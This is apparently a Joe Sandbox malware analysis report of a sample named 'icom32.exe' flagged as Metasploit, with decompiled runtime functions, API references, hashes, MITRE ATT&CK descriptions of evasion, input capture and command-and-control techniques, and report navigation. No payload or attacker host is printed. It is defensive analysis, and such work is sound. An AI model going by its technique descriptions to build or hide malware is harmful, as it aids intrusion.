Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_icom32.jbxd

Similarity

API ID: ErrorFileLast$PointerWrite
String ID:
API String ID: 2977825765-0
Opcode ID: e2327df56d040c3c9ccd6519c96d93ea8b5cc4435d196c8a23b30d7d43f843d1
Instruction ID: a96a09f368e57a1ecaa03160b6809e64ce3bd243fbffe587f432beae5a678c93
Opcode Fuzzy Hash: e2327df56d040c3c9ccd6519c96d93ea8b5cc4435d196c8a23b30d7d43f843d1
Instruction Fuzzy Hash: 9E21A275300300ABC320AB79AD4975E77A4AB85715F10493AF905FB3D1EA39EC2A476F

Uniqueness

Uniqueness Score: -1.00%

Function 0040A45E, Relevance: 6.1, APIs: 4, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E0040A45E() {
				void* __edx;
				int _t26;
				int _t28;
				void* _t32;
				void* _t42;

				asm("enter 0x14, 0x0");
				_t28 = 0;
				if(0 != 0xffffffff) {
					if(0 != 0xfffffffe) {
						if(0 != 0xfffffffd) {
							if(0 != 0xfffffffc) {
								goto L10;
							} else {
								E0040C3C4();
								E0040C3AC(0x81, 0x9f);
								E0040C3AC(0xe0, 0xfc);
								 *0x410668 = 1;
								 *0x40f78c = 0x3a4;
								goto L23;
							}
						} else {
							E0040C3C4();
							goto L23;
						}
					} else {
						_t26 = GetOEMCP();
						goto L3;
					}
				} else {
					_t26 = GetACP();
					L3:
					_t28 = _t26;
					L10:
					if(_t28 == 0) {
						_t28 = 1;
					}
					if(GetCPInfo(_t28, _t42 - 0x14) != 0) {
						E0040C3C4();
						if( *((char*)(_t42 - 0xe)) != 0) {
							 *0x410668 = 1;
						}
						_t32 = 0;
						while( *(_t32 + _t42 - 0xe) != 0 ||  *(_t32 + _t42 - 0xd) != 0) {
							E0040C3AC( *(_t32 + _t42 - 0xe) & 0x000000ff,  *(_t32 + _t42 - 0xd) & 0x000000ff);
							_t32 = _t32 + 2;
						}
						if(_t28 != 1) {
							 *0x40f78c = _t28;
						} else {
							 *0x40f78c = GetOEMCP();
						}
						L23:
						return 0;
					} else {
						return 1;
					}
				}
			}

0x0040c3e9
0x0040c3ed
0x0040c3f2
0x0040c401
0x0040c40e
0x0040c41d
0x00000000
0x0040c41f
0x0040c41f
0x0040c42e
0x0040c43d
0x0040c442
0x0040c44c
0x00000000
0x0040c44c
0x0040c410
0x0040c410
0x00000000
0x0040c410
0x0040c403
0x0040c403
0x00000000
0x0040c403
0x0040c3f4
0x0040c3f4
0x0040c3fa
0x0040c3fa
0x0040c45b
0x0040c45d
0x0040c45f
0x0040c45f
0x0040c471
0x0040c47d
0x0040c486
0x0040c488
0x0040c488
0x0040c492
0x0040c494
0x0040c4ac
0x0040c4b2
0x0040c4b2
0x0040c4b8
0x0040c4c7
0x0040c4ba
0x0040c4c0
0x0040c4c0
0x0040c4cd
0x0040c4d3
0x0040c473
0x0040c47c
0x0040c47c
0x0040c471

APIs

GetACP.KERNEL32 ref: 0040C3F4
GetOEMCP.KERNEL32 ref: 0040C403
GetCPInfo.KERNEL32(00000000,?), ref: 0040C469

Memory Dump Source

Source File: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_icom32.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: ed923042feca6902935afe7c07452c48d24c38187e653d811c9255896a64d3d2
Instruction ID: 57fb5caf2fd4da32a6d8e40e97391991b59a5e203b329fb3f2422f8f95230f07
Opcode Fuzzy Hash: ed923042feca6902935afe7c07452c48d24c38187e653d811c9255896a64d3d2
Instruction Fuzzy Hash: 8921F6B1928200DFEB20A77199D533E3654FB40328F20C77BE452F52E2D67D8846A72E

Uniqueness

Uniqueness Score: -1.00%

Function 00409FB0, Relevance: 6.0, APIs: 4, Instructions: 35
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00409FB0() {
				void _v16;
				long _v20;
				int _t5;
				int _t14;

				while(1) {
					__ecx = __eax;
					__eax = __eax + 1;
					if( *__ecx == 0) {
						break;
					}
					__edx = __edx + 1;
				}
				__eax =  &_v20;
				GetStdHandle(0xfffffff4) = WriteFile(__eax, __esi, __edx,  &_v20, 0);
				 &_v20 =  &_v16;
				_v16 = 0xa0d;
				GetStdHandle(0xfffffff4) = WriteFile(__eax,  &_v16, 2,  &_v20, 0);
				__eax = __edi;
				_t14 = _t5;
				E00406EC0();
				if( *0x410024 == 0) {
					E00409A30();
					E00409B40(0);
					 *0x40f548();
				} else {
					if( *0x40f554 != 0) {
						 *0x40f554();
					}
				}
				 *0x40f510 = 0;
				ExitProcess(_t14);
			}

0x00409fbc
0x00409fbc
0x00409fbe
0x00409fc2
0x00000000
0x00000000
0x00409fc4
0x00409fc4
0x00409fc9
0x00409fd9
0x00409fe8
0x00409fef
0x00409ffd
0x0040a003
0x00406f80
0x00406f82
0x00406f8e
0x00406fb7
0x00406fc3
0x00406fc8
0x00406f90
0x00406f97
0x00406faf
0x00406faf
0x00406f97
0x00406f9c
0x00406fa2

APIs

GetStdHandle.KERNEL32(000000F4,?,00000000,00000000,00000000), ref: 00409FD2
WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 00409FD9
GetStdHandle.KERNEL32(000000F4,?,00000002), ref: 00409FF6
WriteFile.KERNEL32(00000000), ref: 00409FFD

Memory Dump Source

Source File: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_icom32.jbxd

Similarity

API ID: FileHandleWrite
String ID:
API String ID: 3320372497-0
Opcode ID: 95a351159ba936f58842f551fda7181edbfa1f60826e15287b2950b2e7385fb4
Instruction ID: b7d3c4e93a951a471bd7542538c9d89cfedcf3e47952914705911d9f56791a89
Opcode Fuzzy Hash: 95a351159ba936f58842f551fda7181edbfa1f60826e15287b2950b2e7385fb4
Instruction Fuzzy Hash: 35F05E72514241BFE700DB658D4CF677AACEB8A710F288A38B556DA1E0EA348C05C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 004013B0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004013B0() {

				return MessageBoxA(0, "A problem occurred creating DirectInput.\nCheck your DirectX version.\nThis demo requires DirectX9.0 or better.", "DirectX Initialization Error", 0x1010);
			}

0x004013df

APIs

MessageBoxA.USER32 ref: 004013D1

Strings

DirectX Initialization Error, xrefs: 004013C3, 004013C8
A problem occurred creating DirectInput.Check your DirectX version.This demo requires DirectX9.0 or better., xrefs: 004013C9, 004013CE

Memory Dump Source

Source File: 00000000.00000002.780340233.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.780335115.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.780346891.0000000000405000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.780357265.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.780365618.0000000000411000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_icom32.jbxd

Similarity

API ID: Message
String ID: A problem occurred creating DirectInput.Check your DirectX version.This demo requires DirectX9.0 or better.$DirectX Initialization Error
API String ID: 2030045667-2858858835
Opcode ID: c7b1767cf005b00a55e5cc5e99c0d7635ccb520bd2af7105dfca2403ea153c60
Instruction ID: f77f38a1219768b23734804a3f9ca5117bcc8bc56e28a70e1f2f7dd5b70a9df1
Opcode Fuzzy Hash: c7b1767cf005b00a55e5cc5e99c0d7635ccb520bd2af7105dfca2403ea153c60
Instruction Fuzzy Hash: 88D09EA63492043AF130615A6D0AF77B75CC3C2762F10817BBE44A56C5A5A65C1941F9

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report icom32.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Metasploit

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Malware Analysis System Evasion:

Anti Debugging:

Language, Device and Operating System Detection:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Function 00401010, Relevance: 40.5, APIs: 12, Strings: 11, Instructions: 231
networkCOMMON

Function 00406CE0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 137
COMMON

Function 007000D7, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 296
networkCOMMON

Function 007000BA, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 203
networkCOMMON

Function 00406600, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123
timeCOMMON

Function 004097B0, Relevance: 3.0, APIs: 2, Instructions: 14
COMMON

Function 0040C390, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 11
COMMON

Function 007000A7, Relevance: 2.8, APIs: 1, Instructions: 1313
networkCOMMON

Function 004013E0, Relevance: 2.6, APIs: 2, Instructions: 60
sleepCOMMON

Function 0040A660, Relevance: 1.5, APIs: 1, Instructions: 17
COMMON

Function 0070008F, Relevance: 1.5, APIs: 1, Instructions: 7
libraryCOMMON

Function 004072A0, Relevance: 1.3, APIs: 1, Instructions: 51
memoryCOMMON

Function 004092B0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30
libraryloaderCOMMON

Function 00409360, Relevance: 80.8, APIs: 8, Strings: 38, Instructions: 291
fileCOMMON

Function 00408BF0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70
COMMON

Function 0040AA60, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
fileCOMMON

Function 0040A500, Relevance: 6.1, APIs: 4, Instructions: 79
fileCOMMON

Function 0040A45E, Relevance: 6.1, APIs: 4, Instructions: 75
COMMON

Function 00409FB0, Relevance: 6.0, APIs: 4, Instructions: 35
fileCOMMON

Function 004013B0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23
windowCOMMON